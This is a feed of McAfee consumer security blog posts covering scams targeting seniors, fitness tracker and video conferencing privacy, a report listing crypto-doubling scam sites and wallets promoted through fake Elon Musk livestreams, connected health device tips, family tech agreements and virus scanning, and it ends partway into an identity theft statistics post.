The post Does Windows 10 or 11 Need Antivirus Software? appeared first on McAfee Blog.

]]>
Seniors: How to Keep Your Retirement Safe from Online Scams https://www.mcafee.com/blogs/privacy-identity-protection/seniors-how-to-keep-your-retirement-safe-from-online-scams/ Thu, 02 Jun 2022 21:08:07 +0000 https://www.mcafee.com/blogs/?p=154168

The growing number of internet crimes targeting senior adults is mind-blowing. In 2021, more than 92,000 people over the age...

The post Seniors: How to Keep Your Retirement Safe from Online Scams appeared first on McAfee Blog.

]]>

The growing number of internet crimes targeting senior adults is mind-blowing.

In 2021, more than 92,000 people over the age of 60 reported losses of $1.7 billion, according to IC3, the FBI’s Internet Crime division. That number reflects a 74 percent increase in losses from 2020.  

These numbers tell us a few things. They tell us that scamming the elderly is a multi-billion-dollar business for cybercriminals. It also tells us that regardless of how shoddy or obvious online scams may appear to anyone outside the senior community, they are working. 

However, information is power. Senior adults can protect their hard-earned retirement funds and government benefits by staying informed, adopting new behaviors, and putting tools in place designed to stop scammers in their tracks. And, when possible, family, friends, and caregivers can help. 

The FBI said confidence fraud and romance scams netted over $281 million in losses.  

The top four types of scams targeting seniors: Romance scams (confidence scams), fake online shopping, false utility representatives, and government agent imposters. Here’s how to make a few shifts to mindset and your daily routine and steer clear of digital deception.   

5 Safeguards to Protect Your Retirement 

  1. Stop. Don’t share. Often phone or internet scams targeting seniors carry distinctive emotional triggers of elation (you won), fear (you owe), or empathy (please help). For instance, a phony source might urge: “You must send admin fees immediately to access your sweepstake winnings.” Or “You must provide your social security number to stop this agency penalty.” FBI and Better Business Bureau fraud experts advise senior adults to stop and think before taking any action. Be aware of common phishing scams that include legitimate-looking email messages from a bank, federal agency, or service provider requesting you “verify” personal information. The number one rule: Never give out any personal information such as a Social Security number, bank account numbers, Medicare numbers, birthdate, maiden names, work history, or your address. 
  2. Level up your security. Changing times call for new tools and new behaviors online. Consider adopting best practices such as installing McAfee security software, using strong passwords with Two-Factor Authentication (2FA), and knowing how to identify phishing and malware scams are fundamental components of digital literacy. For a deeper dive into cybersecurity best practices, read more.  
  3. Discuss new scams. Scammers rapidly adjust their tactics to current events such as the pandemic, tax season, or an economic crisis to emotionally bait senior adults. If you are a senior adult, check out weekly consumer alerts from IC3 or AARP to stay on top of the types of scams you may encounter. If you are a relative or caregiver to a senior adult, stay informed, discuss these scams with your loved one, and explore other ways to help
  4. Research all charities. Senior adults get daily calls, emails, or even Facebook messages trying to bilk them of their money. It’s essential to do your research. Before donating to a charity, you can consult Give.Org or Charity Navigator to verify the request is legitimate. 
  5. Report all scams and scam attempts. If you’ve been a victim of an online scam or even targeted unsuccessfully, report the incident immediately. Any consumer can report online scams at the FBI’s IC3 website. Credit, debit, or bank account fraud should be immediately reported to your bank.   

Just as the seasons change in our lives, so too must our behaviors when connecting to people and information via our devices. Cybercriminals target older people because they assume they aren’t as informed about schemes or technically savvy as younger people. Senior adults and their loved ones can work daily to change that narrative. With the right mindset, information, and tools, seniors can connect online with confidence and enjoy their golden years without worrying about digital deception.  

The post Seniors: How to Keep Your Retirement Safe from Online Scams appeared first on McAfee Blog.

]]>
Why You Should Care About Fitness Tracker Security https://www.mcafee.com/blogs/internet-security/why-you-should-care-about-fitness-tracker-security/ Thu, 02 Jun 2022 10:41:16 +0000 https://www.mcafee.com/blogs/?p=154060

Congratulations! You reached 10,000 steps today! It’s a great feeling when a wearable fitness device vibrates to let you know...

The post Why You Should Care About Fitness Tracker Security appeared first on McAfee Blog.

]]>

Congratulations! You reached 10,000 steps today!

It’s a great feeling when a wearable fitness device vibrates to let you know when you hit the day’s fitness goal. The digital fireworks display that lights up your watch’s screen is a signal that you should keep on moving to challenge yourself more … or spend the rest of the day on the couch guilt-free.  

While fitness wearable devices, trackers, and apps are excellent motivators for you, cybercriminals love them for their vulnerabilities and privacy loopholes. This doesn’t mean you have to chuck your expensive watch in the bin or delete your fitness apps from your smartphone. Awareness and smart habits go a long way in deterring cybercriminals. Keep reading to learn more about wearable technology vulnerabilities and how you can sidestep each. 

Location Data  

Many fitness tracker apps and wearables are equipped with GPS. At the end of a run or long walk, you can view your exact route, sometimes with detailed maps that show street and town names. This tracking feature was potentially dangerous back in 2018 when a fitness app released a heat map of all its users’ running routes for the year, which clearly outlined secret military bases.1  

Even if you’re stationed in a suburb and not hostile territory, you may consider the risks of sharing your location data. A determined criminal who has time to spare can guess your address and see the times of days when you’re commonly out at the gym or on a run.  

Personally Identifiable Information 

When you purchase a wearable fitness device, you often have to pair it with an accompanying smartphone app to see your daily stats and tailor your fitness goals. Think about all the personally identifiable information (PII) that app now houses: your full name, password, address, height, weight, location, medical concerns, daily activity patterns, etc. In the hands of a cybercriminal, this information can bring a nefarious actor one step closer to impersonating you. Plus, if your health data makes it onto the dark web or is sold to health companies, it may result in serious privacy concerns. 

Luckily, there are ways to get peace of mind about the security of your identity. Identity protection services, such as McAfee Identity Monitoring Service, provide expert identity theft support and up to $1 million in identity theft coverage. 

Tips to Improve Your Fitness Tracker Security 

Wearable devices complement any athleisure outfit and are a fun way to inspire athletic competition between a group of friends. Here are a few ways you can patch some of their security shortcomings: 

Change the factory password settings.

When you first purchase any new device, fitness trackers included, your first step should always be to reset the factory password. Cybercriminals know that many people often skip this step, making it easy for them to walk right into new accounts. If you have a hard time remembering your passwords, consider entrusting them to a password manager to remember them for you. McAfee True Key makes it so that you only have to remember one master password to unlock the rest, and it’s protected by one of the strongest encryption algorithms available. 

Make your account private.

This is a tip you should consider for all your social media accounts. When you post about your life online, you actually divulge a lot of personal details that are helpful to cybercriminals. In the case of fitness trackers and apps, sharing the times of day when you go to the gym, are at the local track, or are on a bike path may give a criminal an idea of windows during the day when your home is empty. It’s unsettling to think that strangers can track your whereabouts, so it’s best to keep those details exclusive to people you personally know and trust. 

Turn off geolocation.

In the case of fitness trackers and apps, a savvy cybercriminal may be able take an educated guess at your address, with which they can do a myriad of nefarious activities. Some running and fitness apps may be able to still create maps of your running routes but erase street names and other landmarks to make it more private. But when in doubt, turn off geolocation.  

Stay on Track 

Fitness trackers are a fun way to stir up some friendly competition, keep connected with your fit friends, and motivate yourself to exercise and maintain healthy habits. While you’re shopping for a new device or when evaluating your current tracker, keep these tips in mind to enjoy this technology to its fullest. 

The post Why You Should Care About Fitness Tracker Security appeared first on McAfee Blog.

]]>
How Secure Is Video Conferencing? https://www.mcafee.com/blogs/internet-security/how-secure-is-video-conferencing/ Fri, 27 May 2022 14:20:27 +0000 /blogs/?p=99533

As millions of people around the world practice social distancing and work their office jobs from home, video conferencing has...

The post How Secure Is Video Conferencing? appeared first on McAfee Blog.

]]>

As millions of people around the world practice social distancing and work their office jobs from home, video conferencing has quickly become the new norm. Whether you’re attending regular work meetings, partaking in a virtual happy hour with friends, or catching up with extended family across the globe, video conferencing is a convenient alternative to many of the activities we can no longer do in real life. But as the rapid adoption of video conferencing tools and apps occurs, is security falling by the wayside?

Avoid Virtual Party Crashers

One security vulnerability that has recently made headlines is the ability for uninvited attendees to bombard users’ virtual meetings. How? According to Forbes, many users have posted their meeting invite links on social media sites like Twitter. An attacker can simply click on one of these links and interrupt an important conference call or meeting with inappropriate content.  

Ensure Data is in the Right Hands

Online conferencing tools allow users to hold virtual meetings and share files via chat. But according to Security Boulevard, communicating confidential business information quickly and privately can be challenging with these tools. For example, users are not always immediately available, even when working from home. In fact, many parents are simultaneously doubling as working parents and teachers with the recent closure of schools and childcare providers. If a user needs to share private information with a coworker but they are unable to connect by video or phone, they might revert to using a messaging platform that lacks end-to-end encryptiona feature that prevents third-party recipients from seeing private messages. This could lead to leaks or unintended sharing of confidential data, whether personal or corporate. What’s more, the lack of using a secure messaging platform could present a hacker with an opportunity to breach a victim’s data or deviceDepending on the severity of this type of breach, a victim could be at risk of identity theft 

Pay Attention to Privacy Policies

With the recent surge of new video conferencing users, privacy policies have been placed under a microscope. According to WIRED, some online conferencing tools have had to update their policies to reflect the collection of user information and meeting content used for advertising or other marketing efforts. Another privacy concern was brought to light by a video conferencing tool’s attention-tracking feature. This alerts the virtual meeting host when an attendee hasn’t had the meeting window in their device foreground for 30 seconds, resulting in users feeling that their privacy has been compromised.  

How to Secure Video Conferences

As users become accustomed to working from home, video conferencing tools will continue to become a necessary avenue for virtual communication. But how can users do so while putting their online security first? Follow these tips to help ensure that your virtual meetings are safeguarded:  

Do your research

There are plenty of video conferencing tools available online. Before downloading the first one you see, do your research and check for possible security vulnerabilities around the tools. Does the video conferencing tool you’re considering use end-to-end encryption? This ensures that only meeting participants have the ability to decrypt secure meeting content. Additionally, be sure to read the privacy policies listed by the video conferencing programs to find the one that is the most secure and fits your needs.  

Make your meetings password protected

To ensure that only invited attendees can access your meeting, make sure they are password protected. For maximum safety, activate passwords for new meetings, instant meetings, personal meetings, and people joining by phone. 

Block users from taking control of the screen

To keep users (either welcome or unwelcome) from taking control of your screen while you’re video conferencing, select the option to block everyone except the host (you) from screen sharing.  

Turn on automatic updates

By turning on automatic updates, you are guaranteed to have all the latest security patches and enhancements for your video conferencing tool as soon as they become available.  

The post How Secure Is Video Conferencing? appeared first on McAfee Blog.

]]>
Crypto Scammers Exploit: Elon Musk Speaks on Cryptocurrency https://www.mcafee.com/blogs/other-blogs/mcafee-labs/crypto-scammers-exploit-elon-musk-speaks-on-cryptocurrency/ Thu, 26 May 2022 06:08:49 +0000 https://www.mcafee.com/blogs/?p=153885

By Oliver Devane  Update: In the past 24 hours (from time of publication)  McAfee has identified 15 more scam sites...

The post Crypto Scammers Exploit: Elon Musk Speaks on Cryptocurrency appeared first on McAfee Blog.

]]>

By Oliver Devane 

Update: In the past 24 hours (from time of publication)  McAfee has identified 15 more scam sites bringing the total to 26. The combined value of the wallets shared on these sites is over $1,300,000 which is an increase of roughly $1,000,000 since this blog was last published. This highlights the scale of this current scam campaign. The table within this blog has been updated to include the new sites and crypto-wallets.

McAfee has identified several Youtube channels which were live-streaming a modified version of a live stream called ‘The B Word’ where Elon Musk, Cathie Wood, and Jack Dorsey discuss various aspects of cryptocurrency.  

The modified live streams make the original video smaller and put a frame around it advertising malicious sites that it claims will double the amount of cryptocurrency you send them. As the topic of the video is on cryptocurrency it adds some legitimacy to the websites being advertised.  

The original video is shown below on the left and a modified one which includes a reference to a scam site is shown on the right.  

We identified several different streams occurring at a similar same time. The images of some are shown below: 

The YouTube streams advertised several sites which shared a similar theme. They claim to send cryptocurrency worth double the value which they’ve received. For example, if you send 1BTC you will receive 2BTC in return. One of the sites frequently asked questions (FAQ) is shown below: 

Here are some more examples of the scam sites we discovered: 

The sites attempt to trick the visitors into thinking that others are sending cryptocurrency to it by showing a table with recent transactions. This is fake and is generated by JavaScript which creates random crypto wallets and amounts and then adds these to the table. 

The wallets associated with the malicious sites have received a large number of transactions with a combined value of $280,000 as of 5 PM UTC on the 5th of May 2022 

Scam Site  Crypto Type  Wallet  Value as on 5PM UTC 5th May 2022 
22ark-invest[.]org  ETH  0x820a78D8e0518fcE090A9D16297924dB7941FD4f  $25,726.46 
22ark-invest[.]org  BTC  1Q3r1TzwCwQbd1dZzVM9mdFKPALFNmt2WE  $29,863.78 
2xEther[.]com  ETH  0x5081d1eC9a1624711061C75dB9438f207823E694  $2,748.50 
2x-musk[.]net  ETH  0x18E860308309f2Ab23b5ab861087cBd0b65d250A  $10,409.13 
2x-musk[.]net  BTC  17XfgcHCfpyYMFdtAWYX2QcksA77GnbHN9  $4,779.47 
arkinvest22[.]net  ETH  0x2605dF183743587594A3DBC5D99F12BB4F19ac74  $11,810.57 
arkinvest22[.]net  BTC  1GLRZZHK2fRrywVUEF83UkqafNV3GnBLha  $5,976.80 
doublecrypto22[.]com  ETH  0x12357A8e2e6B36dd6D98A2aed874D39c960eC174  $0.00 
doublecrypto22[.]com  BTC  1NKajgogVrRYQjJEQY2BcvZmGn4bXyEqdY  $0.00 
elonnew[.]com  ETH  0xAC9275b867DAb0650432429c73509A9d156922Dd  $0.00 
elonnew[.]com  BTC  1DU2H3dWXbUA9mKWuZjbqqHuGfed7JyqXu  $0.00 
elontoday[.]org  ETH  0xBD73d147970BcbccdDe3Dd9340827b679e70d9d4  $18,442.96 
elontoday[.]org  BTC  bc1qas66cgckep3lrkdrav7gy8xvn7cg4fh4d7gmw5  $0.00 
Teslabtc22[.]com  ETH  0x9B857C44C500eAf7fAfE9ed1af31523d84CB5bB0  $27,386.69 
Teslabtc22[.]com  BTC  18wJeJiu4MxDT2Ts8XJS665vsstiSv6CNK  $17,609.62 
tesla-eth[.]org  ETH  0x436F1f89c00f546bFEf42F8C8d964f1206140c64  $5,841.84 
tesla-eth[.]org  BTC  1CHRtrHVB74y8Za39X16qxPGZQ12JHG6TW  $132.22 
teslaswell[.]com  ETH  0x7007Fa3e7dB99686D337C87982a07Baf165a3C1D  $9.43 
teslaswell[.]com  BTC  bc1qdjma5kjqlf7l6fcug097s9mgukelmtdf6nm20v  $0.00 
twittergive[.]net  ETH  0xB8e257C18BbEC93A596438171e7E1E77d18671E5  $25,918.90 
twittergive[.]net  BTC  1EX3dG9GUNVxoz6yiPqqoYMQw6SwQUpa4T  $99,123.42 

Scammers have been using social media sites such as Twitter and Youtube to attempt to trick users into parting ways with their cryptocurrency for the past few years. McAfee urges its customers to be vigilant and if something sounds too good to be true then it is most likely not legitimate.  

Our customers are protected against the malicious sites detailed in this blog as they are blocked with McAfee Web Advisor  

Type  Value  Product  Blocked 
URL – Crypto Scam  twittergive[.]net  McAfee WebAdvisor  YES 
URL – Crypto Scam  tesla-eth[.]org  McAfee WebAdvisor  YES 
URL – Crypto Scam  22ark-invest[.]org  McAfee WebAdvisor  YES 
URL – Crypto Scam  2xEther[.]com  McAfee WebAdvisor  YES 
URL – Crypto Scam  Teslabtc22[.]com  McAfee WebAdvisor  YES 
URL – Crypto Scam  elontoday[.]org  McAfee WebAdvisor  YES 
URL – Crypto Scam  elonnew[.]com  McAfee WebAdvisor  YES 
URL – Crypto Scam  teslaswell[.]com  McAfee WebAdvisor  YES 
URL – Crypto Scam  2x-musk[.]net  McAfee WebAdvisor  YES 
URL – Crypto Scam  doublecrypto22[.]com  McAfee WebAdvisor  YES 
URL – Crypto Scam  arkinvest22[.]net  McAfee WebAdvisor  YES 

 

The post Crypto Scammers Exploit: Elon Musk Speaks on Cryptocurrency appeared first on McAfee Blog.

]]>
Seven Tips for Protecting Your Internet-Connected Healthcare Devices https://www.mcafee.com/blogs/tips-tricks/seven-tips-for-protecting-your-internet-connected-healthcare-devices/ Wed, 25 May 2022 12:15:03 +0000 /blogs/?p=106875

October is Cybersecurity Awareness Month, which is led by the U.S. government’s Cybersecurity and Infrastructure Security Agency (CISA) in conjunction...

The post Seven Tips for Protecting Your Internet-Connected Healthcare Devices appeared first on McAfee Blog.

]]>

October is Cybersecurity Awareness Month, which is led by the U.S. government’s Cybersecurity and Infrastructure Security Agency (CISA) in conjunction with the National Cyber Security Alliance (NCSA)—a national non-profit focused on cybersecurity education & awareness. McAfee is pleased to announce that we’re a proud participant.

Fitness trackers worn on the wrist, glucose monitors that test blood sugar without a prick, and connected toothbrushes that let you know when you’ve missed a spot—welcome to internet-connected healthcare. It’s new realm of care with breakthroughs big and small. Some you’ll find in your home, some you’ll find inside your doctor’s office, yet all of them are connected. Which means they all need to be protected. After all, they’re not tracking any old data. They’re tracking our health data, one of the most precious things we own.

What is internet-connected healthcare?

Internet-connected healthcare, also known as connected medicine, is a broad topic. On the consumer side, it covers everything from smart watches that track health data to wireless blood pressure monitors that you can use at home. On the practitioner side, it accounts for technologies ranging from electronic patient records, network-enabled diagnostic devices, remote patient monitoring in the form of wearable devices, apps for therapy, and even small cameras that can be swallowed in the form of a pill to get a view of a patient’s digestive system.

Additionally, it also includes telemedicine visits, where you can get a medical issue diagnosed and treated remotely via your smartphone or computer by way of a video conference or a healthcare provider’s portal—which you can read about more in one of my blogs from earlier this year. In all, big digital changes are taking place in healthcare—a transformation that’s rapidly taking shape to the tune of a global market expected to top USD 534.3 billion by 2025.

Privacy and security in internet-connected healthcare

Advances in digital healthcare have come more slowly compared to other aspects of our lives, such as consumer devices like phones and tablets. Security is a top reason why. Not only must a healthcare device go through a rigorous design and approval process to ensure it’s safe, sound, and effective, it also held to similar rigorous degrees of regulation when it comes to medical data privacy. For example, in the U.S., we have the Health Insurance Portability and Accountability Act of 1996 (HIPAA), which sets privacy and security standards for certain health information.

Taken together, this requires additional development time for any connected medical device or solution, in addition to the time it takes to develop one with the proper efficacy. Healthcare device manufacturers cannot simply move as quickly as, say, a smartphone manufacturer can. And rightfully so.

Seven tips for protecting your internet-connected healthcare devices

However, for this blog, we’ll focus on the home and personal side of the equation, with devices like fitness trackers, glucose monitors, smart watches, and wearable devices in general—connected healthcare devices that more and more of us are purchasing on our own. To be clear, while these devices may not always be categorized as healthcare devices in the strictest (and regulatory) sense, they are gathering your health data, which you should absolutely protect. Here are some straightforward steps you can take:

1) First up, protect your phone

Many medical IoT devices use a smartphone as an interface, and as a means of gathering, storing, and sharing health data. So whether you’re an Android owner or iOS owner, get security software installed on your phone so you can protect all the things it accesses and controls. Additionally, installing it will protect you and your phone in general as well.

2) Set strong, unique passwords for your medical IoT devices

Some IoT devices have found themselves open to attack because they come with a default username and password—which are often published on the internet. When you purchase any IoT device, set a fresh password using a strong method of password creation.  And keep those passwords safe. Instead of keeping them on a notebook or on sticky notes, consider using a password manager.

3) Use two-factor authentication

You’ve probably come across two-factor authentication while banking, shopping, or logging into any other number of accounts. Using a combination of your username, password, and a security code sent to another device you own (typically a mobile phone) makes it tougher for hackers to crack your device. If your IoT device supports two-factor authentication, use it for extra security.

4) Update your devices regularly

This is vital. Make sure you have the latest updates so that you get the latest functionality from your device. Equally important is that updates often contain security upgrades. If you can set your device to receive automatic updates, do so.

5) Secure your internet router

Your medical IoT device will invariably use your home Wi-Fi network to connect to the internet, just like your other devices. All the data that travels on there is personal and private use already, and that goes double for any health data that passes along it. Make sure you use a strong and unique password. Also change the name of your router so it doesn’t give away your address or identity. One more step is to check that your router is using an encryption method, like WPA2, which will keep your signal secure. You may also want to consider investing in an advanced internet router that has built-in protection, which can secure and monitor any device that connects to your network.

6) Use a VPN and a comprehensive security solution

Similar to the above, another way you can further protect the health data you send over the internet is to use a virtual private network, or VPN. A VPN uses an encrypted connection to send and receive data, which shields it from prying eyes. A hacker attempting to eavesdrop on your session will effectively see a mish-mash of garbage data, which helps keep your health data secure.

7) When purchasing, do your research

One recent study found that 25% of U.S. homeowners with broadband internet expect to purchase a new connected consumer health or fitness device within the next year. Just be sure yours is secure. Read up on reviews and comments about the devices you’re interested in, along with news articles about their manufacturers. See what their track record is on security, such as if they’ve exposed data or otherwise left their users open to attack.

Take care of your health, and your health data

Bottom line, when we speak of connected healthcare, we’re ultimately speaking about one of the most personal things you own: your health data. That’s what’s being collected. And that’s what’s being transmitted by your home network. Take these extra measures to protect your devices, data, and yourself as you enjoy the benefits of the connected care you bring into your life and home.

The post Seven Tips for Protecting Your Internet-Connected Healthcare Devices appeared first on McAfee Blog.

]]>
Why You Need to Get a Family Technology Agreement Happening https://www.mcafee.com/blogs/family-safety/why-you-need-to-get-a-family-technology-agreement-happening/ Tue, 24 May 2022 20:52:36 +0000 https://www.mcafee.com/blogs/?p=154063

There were multiple times during my digital parenting journey when I would have loved to put my head in the...

The post Why You Need to Get a Family Technology Agreement Happening appeared first on McAfee Blog.

]]>

There were multiple times during my digital parenting journey when I would have loved to put my head in the sand. Pretend that life was easy and that my kids weren’t going to grow up and want devices and to join social media. But I didn’t. I couldn’t. With four kids who had technology running through their veins, I had no choice but to embrace it. 

It’s All About Phones 

While many kids will first experience the internet from a family laptop or via their parent’s phone at a coffee shop (we’ve all done it), it’s when they get these devices into their hot little hands unsupervised a few years down the track that the real show starts. And that’s usually when they get access to a phone. Research from our eSafety Office shows that just under half of Aussie kids between 6 and 13 use a smartphone with about 1/3 owning their own device 

And while we can all wax lyrical about the good old days when we used payphones and how great it would be if our kids didn’t have smartphones, we need to keep it real. Technology is not going anywhere so the best thing we can to accept it’s here, educates our kids about how to use it safely and introduce boundaries and rules to ensure they are as safe as possible.  

So, without further ado, let me introduce you to the concept of a family technology contract – a great way to manage your kids and their tech use. 

What Is a Family Technology Contract?  

I like to think of a tech agreement as a clear outline of your expectations of your kids’ digital behavior – any behavior that occurs while using a device should be included in the agreement and yes, include TV here too! Now, before we progress, I have to share one key tip – don’t even think of putting together an agreement like this when tensions are high, or a heated argument is still in place – it will never work. Only talk about this or start working on it when you are in a calm and serene headspace.  

The most important thing is to have an agreement that is suitable for your kids’ ages and maturity and one that works for your family’s schedule. There’s no point making your 5-year-old sign an agreement that limits their time on Instagram when they’re probably quite happy visiting only the online sites that you have ‘bookmarked’ for them. And if your kids have a super busy schedule then you might want to include a rule that means there is no ‘leisure screen time’ (eg TV/movie viewing) till all homework is complete.  

How Old Do My Kids Need To Be? 

While it’s entirely based on your kids’ interests and tech usage, I think 3 is a good age to start with a basic agreement. That’s when they start understanding rules. And how old is too old for a tech contract, I hear you ask? Well, I acknowledge that introducing new rules and boundaries when your kids are well into their teens may be difficult however if things feel out of control and you are concerned about their mental health and less than ideal digital habits then it may also be exactly what you all need! 

What Should An Agreement Include? 

Keeping an agreement age-appropriate and relevant is essential. You may also want to keep it simple and focus on a few key things, such as: 

  • Be kind online always 
  • Never share passwords with your friends 
  • Always tell an adult if you see anything that upsets or scares you 

But it can include so much more. Here are some items you may choose to include in your own personalized version. Think of this list as a shopping list. Simply, pick & choose what works for the ages of your kids and your family’s structure. 

Time Limits/Device Usage 

  • I will ask permission before I use my device (younger children). 
  • I can use the internet/my devices/TV for __ hours a day after school. 
  • I can’t use my devices past __ pm in the evening. 
  • When I am not using my device, I will place it ___________.  
  • I will place my device in the family charging zone overnight. (This could be on the kitchen bench in a study, whatever works for your family) 

Responsibility 

  • I understand that any internet-enabled device (eg smartphone and laptop) can give me access to many things that may not be suitable for my age. I will use my devices safely and avoid clicking on any appropriate sites. (You could choose to list sites your kids can’t visit however this maybe, in fact, give them ideas! You choose what works best). 
  • I understand that it is my responsibility to protect my personal information and not share it freely online. This includes my name, family details, school, telephone numbers, and address. 
  • I will keep my password private and not share it with anyone outside my family. 
  • I understand that not everything is as it seems online and that being safe (and savvy) online means thinking critically and questioning whether it is true. 
  • I will not use a credit card online without permission from my parents. 
  • I will close down pop-up or banner ads and not click on them. 

Safety 

  • I will not share my location while using my devices.  
  • I will allow my parents to adjust the privacy settings on this device and monitor my activity. I understand that this is for my own safety. If older: I will ensure privacy settings are always on and set to the highest level for every social media platform I use. 
  • If anyone pressures me or makes me feel uncomfortable, I will stop talking to them and tell a family member or trusted adult.  
  • I understand that people are not always who they say they are online. 
  • I will not talk to anyone online who I don’t know in real life. 
  • I will not meet up with anyone I first met online without permission from my parents. 

Online Behaviour 

  • Being kind and respectful online is essential.  
  • I will only talk to people I know in real life when I am online (ideally, we’d want all our kids to agree to this but in reality, older teens won’t cop this. So, this is more suitable for younger kids) 
  • I will not be hurtful or mean to others on social media. This includes messaging, commenting, posting, liking, and sharing mean or hateful content.  
  • If I feel like I am being harassed or bullied online, I will tell a trusted adult.  
  • I will ask permission before I share pictures or videos of my friends. 
  • I will not share any content that is too revealing. This includes posting or sending inappropriate photos or messages. 

Smartphone Usage 

  • I will ensure my mobile phone stays in its protective case at all times. If it or the screen protector cracks or breaks, I will tell my parents.  
  • I will not use my phone when at school unless ___________________________. 
  • These places are no-phone zones:  
  1. Our family does not use our phones during dinner. 
  2. I will shut off my phone at __ pm and it will not be turned back on until ___ am. (You could also add here – after breakfast and/or until I am ready for school. 
  3. I will get permission from my parents before I download any apps on my smartphone – this includes games. 

Gaming 

  • I can play games that are rated: _____. (Ratings on games range from G, PG, M, MA15+ to R here in Australia). Please do your research here and work out what’s suitable for your kids. Check out the Australian Classification Board’s latest ratings for games to help make your decision. 
  • Video games that I am not allowed to play at my home, or anyone else’s home include: (list what games are off-limits) 
  • I will ensure my privacy settings are set to the highest level. 
  • I will not talk to people I don’t know in real life while gaming. 

Consequences 

I understand that access to my devices is a privilege and breaking this agreement will lead to the following consequences: (list what you feel is appropriate) 

Formalizing The Agreement 

I would have all parties sign and date the agreement: both parents and kids. You may choose to keep a copy on the fridge? Again, whatever works for your situation. 

So, if you are feeling like this digital parenting thing is getting the better of you, please consider introducing an agreement. For decades, parenting experts have written about the virtues of establishing clear boundaries for our kids and in my opinion, a tailored family tech agreement absolutely does that! 

Good luck!! 

Alex x  

The post Why You Need to Get a Family Technology Agreement Happening appeared first on McAfee Blog.

]]>
How To Do A Virus Scan https://www.mcafee.com/blogs/privacy-identity-protection/how-to-do-a-virus-scan/ Thu, 19 May 2022 10:23:40 +0000 /blogs/?p=98494

Whether you think you might have a virus on your computer or devices, or just want to keep them running...

The post How To Do A Virus Scan appeared first on McAfee Blog.

]]>

Whether you think you might have a virus on your computer or devices, or just want to keep them running smoothly, it’s easy to do a virus scan. How to check for viruses depends on the software and device you have, so we’ll go through everything you need to know to run a scan effectively and keep your computers, phones and tablets in tip-top shape.

Do You Need a Virus Scan?

First, let’s cover a few of the telltale signs your device might have a virus. Is your computer or device acting sluggish or having a hard time booting up? Have you noticed missing files or a lack of storage space? Have you noticed emails or messages sent from your account that you did not write? Perhaps you’ve noticed changes to your browser homepage or settings? Or maybe, you’re seeing unexpected pop-up windows, or experiencing crashes and other program errors. These are all examples of signs that you may have a virus, but don’t get too worried yet, because many of these issues can be resolved with a virus scan.

What Does a Virus Scan Do?

Each antivirus program works a little differently, but in general the software will look for known malware that meets a specific set of characteristics. It may also look for variants of these known threats that have a similar code base. Some antivirus software even checks for suspicious behavior. If the software comes across a dangerous program or piece of code, it removes it. In some cases, a dangerous program can be replaced with a clean one from the manufacturer.

How to Check for Viruses

The process of checking for viruses depends on the device type and its operating system. Check out these tips to help you scan your computers, phones and tablets.

On a Windows computer

If you use Windows 10, go into “Settings” and look for the “Updates & Security” tab. From there you can locate a “Scan Now” button.

Of course, many people have invested in more robust antivirus software that has a high accuracy rate and causes less drain on their system resources, such as McAfee Total Protection. To learn how to run a virus scan using your particular antivirus software, search the software’s help menu or look online for instructions.

On a Mac computer

Mac computers don’t have a built-in antivirus program, so you will have to download security software to do a virus scan. There are some free antivirus applications available online, but we recommend investing in trusted software that can protect you from a variety of threats. Downloading free software and free online virus scans can be risky, since cybercriminals know that this is a good way to spread malware.

Whichever program you choose, follow their step-by-step instructions on how to perform a virus scan, either by searching under “help” or looking it up on their website.

On smartphones and tablets

Yes, you can get a virus on your phone or tablet, although they are less common than on computers. However, the wider category of mobile malware is on the rise and your device can get infected if you download a risky app, click on an attachment in a text message, visit a dangerous webpage, or connect to another device that has malware on it.

Fortunately, you can protect your devices with mobile security software. It doesn’t usually come installed, so you will have to download an application and follow the instructions.

Because the Android platform is an open operating system, there are a number of antivirus products for Android devices, that allows you to do a virus scan.

Apple devices are a little different because they have a closed operating system that doesn’t allow third parties to see their code. Although Apple has taken other security precautions to reduce malware risks, such as only allowing the installation of apps from Apple’s official app store, these measures aren’t the same as an antivirus program.

For more robust protection on your Apple devices, you can install mobile security software to protect the private data you have stored on your phone or tablet, such as contacts, photos and messages.

All-In-One Protection:

If safeguarding all your computers and devices individually sounds overwhelming, you can opt for a comprehensive security product that protects computers, smartphones and tablets from a central control center, making virus prevention a breeze.

Why are virus scans so important?

New online threats emerge every day, putting our personal information, money and devices at risk. In the first quarter of 2019 alone McAfee detected 504 new threats per minute, as cybercriminals employed new tactics. That’s why it is essential to stay ahead of these threats by using security software that is constantly monitoring and checking for new known threats, while safeguarding all of your sensitive information. Virus scans are an essential part of this process when it comes to identifying and removing dangerous code.

How often should you run a virus scan?

Most antivirus products are regularly scanning your computer or device in the background, so you will only need to start a manual scan if you notice something suspicious, like crashes or excessive pop-ups. You can also program regular scans on your schedule.

Preventing Viruses

Of course, the best protection is to avoid getting infected in the first place. Here are a few smart tips to sidestep viruses and other malware:

  • Learn how to surf safely so you can avoid risky websites, links and messages. This will go a long way in keeping you virus-free.
  • Never click on spammy emails or text messages. These include unsolicited advertisements and messages from people or companies you don’t know.
  • Keep the software on your computers and devices up to date. This way you are protected from known threats, such as viruses and other types of malware.
  • Invest in comprehensive security software that can protect all of your devices, such as McAfee LiveSafe.
  • Stay informed on the latest threats, so you know what to look out for. The more you know about the latest scams, the easier they will be to spot and avoid.

The post How To Do A Virus Scan appeared first on McAfee Blog.

]]>
A Guide to Identity Theft Statistics for 2022 https://www.mcafee.com/blogs/tips-tricks/a-guide-to-identity-theft-statistics-for-2022/ Wed, 18 May 2022 23:27:23 +0000 https://www.mcafee.com/blogs/?p=150751

There’s a digital counterpart for nearly everything we do, which means more of our personal information is online. And although...

The post A Guide to Identity Theft Statistics for 2022 appeared first on McAfee Blog.

]]>

There’s a digital counterpart for nearly everything we do, which means more of our personal information is online. And although this tends to make our lives easier, it opens the door for information to land in the wrong hands. Identity theft happens when someone uses your personal identifiable information (PII) for their own monetary or personal gain. Sensitive data like credit card numbers and Social Security numbers can be incredibly valuable if it gets into the wrong hands.  

The good news is that you can take steps to minimize the risk of identity theft. This article breaks down some of the most interesting fraud statistics and trends about identity theft in the United States and offers ways to protect your personal data from cybercriminals. 

Identity theft by the numbers

The number of identity theft cases reported to the Federal Trade Commission (FTC) has increased in the last five years. According to the FTC’s Consumer Sentinel Network (CSN) report, the number of reported cases more than doubled from 2019 to 2020.  

One possible reason for this upward trend is the coronavirus pandemic. Congress passed legislation that included more than $5 trillion in various government benefits. This money was helpful to out-of-luck Americans, but it was also extremely attractive to scammers who used the opportunity to create fake identities and steal unemployment checks. In fact, the most common type of identity theft this past year was government documents and benefits fraud 

What else do the numbers say about the rise in identity theft? Let’s take a closer look: 

